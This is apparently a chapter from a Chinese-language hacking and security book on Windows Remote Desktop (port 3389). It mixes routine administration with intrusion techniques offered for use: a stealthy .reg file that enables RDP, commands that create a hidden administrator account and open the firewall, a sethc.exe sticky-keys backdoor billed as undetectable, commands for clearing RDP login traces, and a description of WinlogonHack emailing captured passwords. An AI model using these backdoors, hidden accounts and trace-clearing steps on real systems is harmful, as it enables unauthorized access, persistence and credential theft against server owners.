1.16 遠程終端的安裝與使用

Windows XP/2000/2003 Server中的Windows Terminal Services（WTS）又稱為遠程終端服務（Remote Terminal Services）或者俗稱為3389，是在Windows NT中最先使用的一種終端，在Windows 2000 Professional版本中不可以安裝，在 Windows 2000 Server或以上版本才可以安裝這個服務，其默認服務端口為3389，在Windows XP系統中稱為“遠程桌面（Remote Desktop）”。遠程終端服務是Windows 2000 Server中的一項重要服務，主要通過遠程桌面連接來對服務器進行管理或者運行應用程序，其功能類似于遠程管理軟件，由于遠程終端服務使用簡單、方便，不產生交互式登錄，而且可以在后臺操作，因此在各行各業都有大量的應用，深受用戶喜愛。

遠程終端服務在很多大型系統中使用得越來越廣泛，正是由于遠程終端服務在Windows Server 2000以及Windows 2003 Server中開啟非常簡單方便，一般情況都不需要重新安裝，只需要運行幾行DOS命令即可開啟，且由于使用終端不受IP地址的限制，只要擁有用戶賬號及其對應的用戶口令，就可以正常登錄，因此對Windows XP/2000/2003 Server來講遠程使用終端服務即開啟了方便之門，也開啟了網絡安全的安全隱患之門，而且目前還有針對Windows XP/2000/2003 Server及其以上版本的遠程終端服務攻擊的軟件，一旦攻擊成功，對于運行重要程序的服務器將會帶來不可估量的經濟損失，下面對遠程終端服務以及相關安全技術進行分析。

1.16.1 Windows 2000 Server開啟遠程終端

在Windows 2000 Server中，有許多開啟遠程終端服務方法，歸納起來對于遠程終端的開啟主要通過以下步驟來進行。

（1）查看“Terminal Services”是否開啟。可以通過服務器中的“服務管理”以及通過DOS命令下的“net start”來查看。如果在服務管理器中“Terminal Services”的狀態為“啟動”，則表示“Terminal Services”開啟成功；而在DOS命令下使用“net start”的結果中如果出現了“Terminal Services”則表示開啟了遠程終端服務。

（2）啟動Windows Terminal Services服務。

（3）使用“遠程桌面連接”（RDP）連接遠程終端，如果使用RDP連接遠程終端成功，則表示遠程終端服務開啟成功。

1.16.2 Windows XP開啟遠程終端

Windows XP開啟3389分為兩種情況，一種就是管理員為了方便自己，另外一種就是入侵者在獲取權限下非法開啟3389，下面分為兩種情況來介紹。管理員開啟也就是圖形界面開啟，操作非常簡單，按照下面的步驟即可完成。

1.Windows XP用戶開啟3389

單擊“我的電腦”-“屬性”-“遠程”，如圖1-124所示，選中“允許從這臺計算機發送遠程協助邀請”即可。

2.查看遠程終端端口開放情況

單擊“開始”-“運行”，在打開中輸入“cmd”打開命令提示符，在其中輸入“netstat-an | find "3389"”如果遠程終端開啟成功，那么就會顯示默認的3389端口正在監聽，如圖1-125所示。

3.測試連接遠程終端

單擊“開始”-“運行”，在打開中輸入“mstsc.exe”打開遠程桌面連接客戶端，在計算機中輸入本機IP地址，接著會出現一個錯誤提示，如圖1-126所示。不要緊張，在Windows XP中本機不能自己連接自己的3389，但在Windows 2003中就可以自己連接自己的IP地址。這時就可以換虛擬機進行連接，在虛擬機中輸入本機的IP地址。

1.16.3 Windows 2003開啟遠程終端

1.允許開啟遠程終端

在Windows 2003中單擊“我的電腦”-“屬性”-“遠程”，打開的界面如圖1-130所示，在遠程桌面中選中“允許用戶遠程連接到這臺計算機”，允許開啟遠程終端。

2.授權遠程桌面用戶

單擊“選擇遠程用戶”，彈出如圖1-131所示的用戶選擇界面，單擊添加按鈕選擇一個遠程桌面訪問用戶，在本例中選擇的是asp.net用戶。

3.查看遠程終端端口

打開DOS命令提示符窗口，如圖1-132所示，使用“netstat -an”或者“netstat -an | find"3389"”命令查看3389端口開啟情況，如果在列表中顯示3389端口已經開放，說明遠程終端開啟成功。

4.遠程終端登錄測試

單擊“開始”-“運行”，在打開的DOS命令符窗口中輸入“mstsc”命令，打開遠程登錄窗口，在其地址欄輸入剛才開啟遠程終端的計算機的IP地址，單擊連接，打開遠程桌面登錄窗口，輸入用戶名和密碼，登錄成功后如圖1-133所示，表明遠程終端開啟成功。

1.16.4 一些常見開啟遠程終端服務的方法

1.使用rots.vbs腳本

Rots.vbs是由網名為“灰色軌跡zzzevazzz”寫的一個VBS腳本，該腳本通過系統中自帶的cscript.exe應用程序來執行，使用該腳本可以開啟終端服務以及修改終端服務端口，其使用格式為：

cscript.exe rots.vbs ip user userpass port /r或cscript.exe rots.vbs ip user userpass port /fr

2.使用bat命令

通過記事本建立一個bat文件，在其中分別輸入以下內容：

echo [Components] > c:\sql
echo TSEnable = on >>sql
c:\sqlsysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q

運行該批處理命令后，重新啟動計算機，則遠程終端服務開啟成功，該方法不能更改終端服務的端口。

3.導入一個reg文件到需要開啟終端服務的機器中

該方法主要是修改遠程終端服務的端口及其相關設置，通過生成一個以reg為后綴的文件，將該文件導入到需要開啟終端服務的計算機上。該方法比較隱蔽，通過服務管理器以及“net start”命令均不會發現終端服務已經啟動。Reg文件內容如下：

Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache]
"Enabled"="0"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"ShutdownWithoutLogon"="0"
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]
"EnableAdminTSRemote"=dword:00000001
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
"TSEnabled"=dword:00000001
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD]
"Start"=dword:00000002
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]
"Start"=dword:00000002
[HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle]
"Hotkey"="1"
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp]
"PortNumber"=dword:00000D3D
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp]
"PortNumber"=dword:00000D3D

4.使用SQL注入軟件啟動3389服務

在Domain3.5以及網名為教主的HDSI2.0 SQL等注入工具中均提供了開啟3389終端服務功能，使用該類軟件來開啟3389的前提條件是運行Web服務的服務器必須存在SQL注入漏洞，而且數據庫用戶的權限較大，在SQL Server 2000中數據庫用戶必須為sa。

5.使用其他軟件開啟3389

在網上其他一些流行軟件其開啟原理跟前面類似，只是使用不同的編程語言進行實現。

1.16.5 開啟遠程終端控制案例

本案例中的開啟遠程終端控制案例是在已經取得計算機的一個Shell的前提下，通過執行vbs腳本或者批處理命令來執行。在本案例中是在Windows 2000 Server中使用批處理命令開啟遠程終端。

（1）在Shell中執行2000.bat腳本，2000.bat腳本內容如圖1-134所示，可以將該腳本文件復制或者上傳到需要開啟遠程終端服務的計算機中，然后執行該腳本文件即可。

（2）重啟計算機。在Windows 2000 Server中開啟遠程終端服務必須重啟才能生效。

（3）使用遠程終端連接器進行連接測試。重啟Windows 2000 Server后，需要先查看被開啟遠程終端服務的計算機的遠程終端是否開放?？梢允褂脪呙柢浖蛘遱find等小工具查看遠程終端端口開放情況，例如輸入命令“sfind -p 4455 192.168.1.100”來查看IP地址為192.168.1.100的計算機4455端口是否開放。如果開放則可以使用遠程終端連接器進行連接。出現遠程終端連接桌面后，輸入用戶名和密碼即可進入遠程終端桌面管理。

1.16.6 命令行開啟遠程終端

（1）實用注冊表命令開啟3389

直接打開命令提示符或者在telnet命令下直接將以下代碼粘貼復制執行即可。

reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /f
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0

（2）來自國外黑客的開啟3389命令

雖然見證了很多在WindowsXP和Windows2003下開啟3389的命令，但下面這個命令是最為好用的，他不但添加了一個用戶，同時將該用戶添加到遠程桌面用戶組中，避免了權限限制情況下不能登錄的問題，同時通過命令運行防火墻通過3389，實在是好命令。該命令在Windows2003下執行更佳，在Windows XP下添加用戶后容易被用戶發現。

net user antian365.com antian365 /add
net localgroup Administrators antian365.com /add
net localgroup "Remote Desktop Users" antian365.com /add
attrib +h "%SYSTEMDRIVE%\Documents and Settings\antian365.com" /S /D
echo Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v
fDenyTSConnections /t reg_dword /d 0
echo Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v
AllowTSConnections /t reg_dword /d 1
echo Y | reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "antian365.com" /t
REG_DWORD /d 00000000 /f
sc config rasman start= auto
sc config remoteaccess start= auto
net start rasman
net start remoteaccess

1.16.7 3389實用技巧

1.實用技巧之一——修改默認端口

默認狀態下遠程桌面使用的端口一般為“3389”，如果不及時將這個端口號碼更改掉的話，那么許多別有用心的黑客可能會利用這個端口，來遠程控制和入侵本地工作站，以便竊取保存在本地工作站中的各類隱私信息。目前還有單獨針對遠程終端攻擊的軟件，如果你設置的密碼碰巧在他的攻擊字典中，那么很不幸地告訴你，你的計算機將被攻陷，因此在系統管理中修改默認端口就非常有必要了。修改默認端口3389為其他任意未使用的端口即可。下面介紹兩種方法來修改端口。

（1）圖形界面修改

首先以特權身份（管理員）登錄進本地工作站或者服務器系統，用單擊系統桌面中的“開始”-“運行”命令，從彈出的系統運行框中，輸入字符串命令“regedit”，單擊“確定”按鈕后，打開本地工作站的系統注冊表編輯界面；在該編輯界面的左側顯示區域，用鼠標展開HKEY_LOCAL_MACHINE注冊表分支，從其后彈出的分支列表中依次選中SYSTEM\CurrentControlSetControl\Terminal Server\Wds\rdpwd\Tds\tcp子鍵，在tcp子鍵所對應的右側顯示區域中，我們會看到一個名為PortNumber的子鍵（如圖1-136所示），這個子鍵其實就是用來定義遠程桌面端口號碼的，默認是以十六進制顯示為“0X00000D3D”。雙擊該鍵值即可將該子鍵的數值設置成其他端口號碼，如圖1-137所示，在數字數據中可以任意輸入一個未使用的端口，一般設置大端口號即可，例如可以將其數值設置成“8888”。

完成數值修改操作后，我們再將鼠標定位于注冊表分支HKEY_LOCAL_MACHINE\ SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp，在RDP-Tcp子鍵所對應的右側顯示區域中，我們同樣會看到一個名為PortNumber的子鍵，把該子鍵的數值也要一并加以修改，例如這里我們也要將它的數值修改成“8888”。到此3389的端口修改就完成了，此時使用遠程終端的格式變更為“server port:8888”，例如IP地址為192.168.1.8的遠程終端使用方法為“192.168.1.8:8888”，也即在遠程終端連接的地址中輸入“192.168.1.8:8888”進行連接。

（2）使用批處理修改終端端口

使用批處理修改默認端口需要事先計算出遠程終端端口號的十六進制值，例如我們修改成“8888”其對應的端口十六進制值為“0X22B8”，使用下面命令即可完成端口的修改，將3389端口修改為8888端口。

REG ADD "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp" /v PortNumber /t REG_DWORD /d 0X22B8 /f
REG ADD "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0X22B8 /f

2.實用技巧之二——查詢端口

查詢端口的操作方式都差不多，主要通過查詢注冊表和下面介紹兩種查詢終端端口（適用于XP專業版、2000服務器版與2003操作系統）。

（1）通過查詢注冊表

REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\ WinStations\RDP-Tcp /v PortNumber

查詢結果如圖1-138所示，在查詢結果中顯示的是“PortNumber REG_DWORD 0xd3d”，端口值為16進制編碼，0xd3d表示端口號碼為3389，可以將這個值復制到科學計算器中進行十六進制和十進制之間的換算即可（如圖1-139所示）。0xd3d=13×16×16+3×16+13×1=3389。

還可以通過以下命令來顯示3389的更多詳細信息，顯示結果如圖1-140所示，regedit /e tsp.reg "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal server\ Wds\rdpwd\Tds\tcp"

type tsp.reg

（2）通過VBS腳本命令來查詢

使用VBS腳本命令來查詢，一般也使用批處理來執行，在有些情況下，系統禁止執行vbs腳本（刪除Windows Script Host 組件）。其代碼如下，執行效果如圖1-141所示。

Echo Dim ReadComputerName >>port.vbs
Echo Set ReadComputerName=WScript.CreateObject("WScript.Shell") >>port.vbs
Echo Dim TSName,TSRegPath >>port.vbs
Echo TSRegPath="HKLM\System\CurrentControlSet\Control\Terminal Server\ WinStations\RDP-Tcp\PortNumber" >>port.vbs
Echo TSName=ReadComputerName.RegRead(TSRegPath) >>port.vbs
Echo WScript.Echo("TermService port is:"^&TSName) >>port.vbs
Cscript port.vbs

上面所對應的VBS腳本為：

Dim ReadComputerName
Set ReadComputerName=WScript.CreateObject("WScript.Shell")
Dim TSName,TSRegPath
TSRegPath="HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp\PortNumber"
TSName=ReadComputerName.RegRead(TSRegPath)
WScript.Echo("TermService port is:"&TSName)

將以上代碼保存為ports.vbs，然后在命令提示符或者telnet窗口執行“Cscript port.vbs”即可。

3.實用技巧之三——控制終端用戶的操作界面

根據我的經驗，在眾多的遠程控制、遠程管理軟件中，微軟的終端服務是速度最快的，不過終端服務也有一個很不人性化的地方，就是在默認情況下，我們是看不到終端用戶的操作界面的，這在某些場合很不方便，比如你想在進行遠程操作的同時也讓對方能夠看到你的操作界面，但終端服務下他是看不到的，其實，可以通過一些手段讓對方看到遠程操作的。

（1）A用戶先登錄遠程終端服務器，然后進入進入命令行窗口。

（2）A用戶獲取當前運行的會話ID。運行“query session”命令，如圖1-142所示，找出A會話的會話ID，這里是1，當前會話前有一個“>”標志，Console會話表示控制臺。

（3）運行“shadow 會話ID號”，由于上面的A會話ID是1，所以要跟B他遠程控制這里命令就是“shadow 2”，如圖1-143所示，在A中會給出一段提示，凍結A用戶當前的連接。記住不能自己跟自己shadow。

（4）此時B的終端服務界面會出現一個遠程控制請求的對話框，如圖1-144所示，如果B同意了請求，那么就可以遠程控制和查看A的會話了，此時A仍能隨意進行操作，如圖1-145所示，A用戶在遠程終端的所有操作，都會在B用戶的遠程終端上面顯示。如果要退出，則執行“Logoff”命令即可。

4.實用技巧之四——遠程關閉終端服務器

如果要遠程關掉終端服務器，可能大家通常都是直接使用開始菜單中的關機功能，但這種方式在關機時不會向終端用戶發送消息，所以大家可以使用“tsshutdn”命令，比如我要在15秒內關掉終端服務器，就可以直接使用下面的命令：

Tsshutdn 15 /powerdown

要取消關機可以按CTRL+C組合鍵。

5.實用技巧之五——查看所有終端服務客戶端運行的程序

有時服務器管理員可能想了解現在到底有多少用戶在登錄終端服務器，這些用戶到底在運行些什么程序，這時可以使用Query系列命令，有 “query process”、“query session”、“query user”等，分別是查看進程、會話和用戶的。另外要向客戶端發送消息，可以使用msg命令。

6.實用技巧之六——重啟計算機

在遠程終端上面執行“iisreset /reboot /timeout:00”命令后系統會自動進行重啟，這在入侵過程非常好用，在韓文，阿拉伯等看不懂文字的情況下執行該命令不會誤操作將計算機關機。

7.實用技巧之七——靈活應用快捷鍵

熟練運用遠程終端的快捷鍵，不但能夠顯示出高超的基本功，還能在實際應用過程發揮作用，比較時間就是金錢，在數秒時間就搞定一切，那是一種境界和修養，下面就是遠程終端的一些快捷鍵。

CTRL+ALT+END調出“任務管理器”和打開“Windows鎖定”對話框。

CTRL+ALT+BREAK這個就是切換全屏顯示，在窗口和全屏顯示之間切換客戶端。

ALT+PAGE UP從左向右在程序之間切換。

ALT+PAGE DOWN從右向左在程序之間切換。

ALT+INSERT按啟動順序來回切換程序。

ALT+HOME顯示“開始”菜單。

ALT+DELETE顯示窗口的彈出式菜單。

CTRL+ALT+減號 (-) 將客戶端活動窗口的快照放在“終端”服務器的剪貼板上（與在本地計算機上按下ALT+PrintScrn鍵時的功能相同）。

CTRL+ALT+加號 (+) 將整個客戶端窗口區域的快照放在“終端”服務器的剪貼板上（與在本地計算機上按下PrintScrn鍵時的功能相同）。

8.實用技巧之八——限止指定用戶可登錄終端

為了保證服務器的安全沒必要讓服務器所有用戶都允許登錄，我們可以指定一個管理員賬號可以登錄。這就是限定某一個用戶才能登錄遠程終端，通俗地講就是將允許登錄的用戶加入到遠程桌面登錄用戶組即可。具體操作方法為：

單擊“管理工具”-“終端服務配置”-“連接”，再選擇右邊的“RDP-TCP”的屬性，找到“權限”選項，刪除administrators組，然后再添加我們允許的這個用戶，其他一律不允許登錄，如圖1-146所示。這就是在很多情況下，即使你提權成功并且添加自己為管理員用戶，也不能登錄3389，即使密碼輸入正確。

9.實用技巧之九——我的3389我做主

“終端服務”默認沒有日志記錄，需要手動設置。遠程終端啟用日志審核后就能夠了解我的3389，誰什么時候登錄，什么時候注銷的。具體開啟方法如下：

單擊“管理工具”-“終端服務配置”-“連接”，再選擇右邊的“RDP-TCP”的屬性，找到“權限”選項，然后單擊其下面的“高級”按鈕，進入“RDP-TCP高級安全設置”，在“RDP-TCP高級安全設置”中單擊“審核”，然后單擊“添加”按鈕，在選擇用戶和組中單擊“高級”-“立即查找”，在搜索結果中找到“everyone”用戶將其添加審核項目中，如圖1-147所示，然后選擇需要記錄的事件。一般審核以下幾個事件：

登錄 成功 失敗

連接 成功

注銷 成功

斷開 成功

10.實用技巧之十——記錄登錄3389的IP地址和時間

關于這個東東首先是在虛擬機上看到的，在一些大型虛擬機上面當一登錄系統，會突然閃出一個DOS窗口，又突然消失了，后面通過分析，知道這個是管理員在記錄誰登錄過自己的操作系統。當時覺得很什么其實簡單，具體操作步驟如下：

（1）創建記錄3389登錄時間的批處理文件和日志文件

3389.bat：用戶登錄時運行的腳本文件。

3389log.txt ：記錄3389登錄的IP地址和時間的txt文件。

3389.bat”批處理腳本文件內容如下：

date /t >>3389log.txt
time /t >>3389log.txt
netstat -n -p tcp | find ":3389">>3389log.txt
start Explorer

解釋

第一行和第二行代碼用于記錄用戶登錄的時間。

第三行代碼記錄終端用戶的IP地址，“netstat”是用來顯示當前網絡連接狀況的命令，“-n”用于顯示IP和端口，“-p tcp”顯示TCP協議，管道符號“|”會將“netstat”命令的結果輸出給“find”命令，再從輸出結果中查找包含“3389”的行，然后把這個結果重定向到日志文件“3389log.txt”，最后一行為啟動Explorer的命令。

（2）配置“終端服務器配置”

首先進入系統管理工具中的“終端服務器配置”，進入到默認RDP-Tcp屬性中，然后切換到“環境”頁下，啟用“用戶登錄時啟用下列程序”在程序路徑和文件名處填寫“c:\rdp\3389.bat”；并在起始于填寫：“c:\rdp”，如圖1-148所示。需要特別注意的是，這兩個選項一定要正確，3389.bat文件位于C盤rdp文件夾下，而起始這是指3389.bat前面的路徑，否則將出現3389登錄錯誤，導致用戶無法正常登錄3389；一個好的解決方法是登錄3389進行配置，但不退出，然后在本地另起一個3389登錄，進行測試。網上還流傳有其他類似的腳本，其原理大同小異，無外乎加載腳本的地方不一樣。

11.實用技巧之十一——清除3389的登錄記錄

用一條系統自帶的命令：

reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client"/f

取消xp&2003系統防火墻對終端服務3389端口的限制及IP連接的限制

REG ADD HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\ FirewallPolicy\StandardProfile\GloballyOpenPorts\List /v 3389:TCP /t REG_SZ /d 3389:TCP:*:Enabled:@xpsp2res.dll,-22009 /f

12.實用技巧之十二——去掉限制登錄

終端超出最大連接數時可用下面的命令來連接

mstsc /v:ip:3389 /console

13.實用技巧之十三——永不查殺的3389后門

永不查殺的3389后門其原理就是利用shift后門，連敲5次Shift鍵即可直接進入服務器。將以下代碼復制到服務器上通過DOS命令提示符窗口執行即可。

@echo off
copy c:\windows\explorer.exe c:\windows\system32\sethc.exe
copy c:\windows\system32\sethc.exe c:\windows\system32\dllcache\sethc.exe attrib c:\windows\system32\sethc.exe +h
attrib c:\windows\system32\dllcache\sethc.exe +h
echo. & pause
Exit

14.實用技巧之十四——WinlogonHack記錄3389登錄密碼

WinlogonHack的原理很簡單就是記錄管理員登錄的密碼，當有3389登上時，自動加載DLL，并且記錄登錄密碼！保存為boot.dat文件。最新的一些版本已經可以將記錄的密碼發送到指定的郵箱，只要服務器連接網絡，那么肉雞就永遠不會丟失。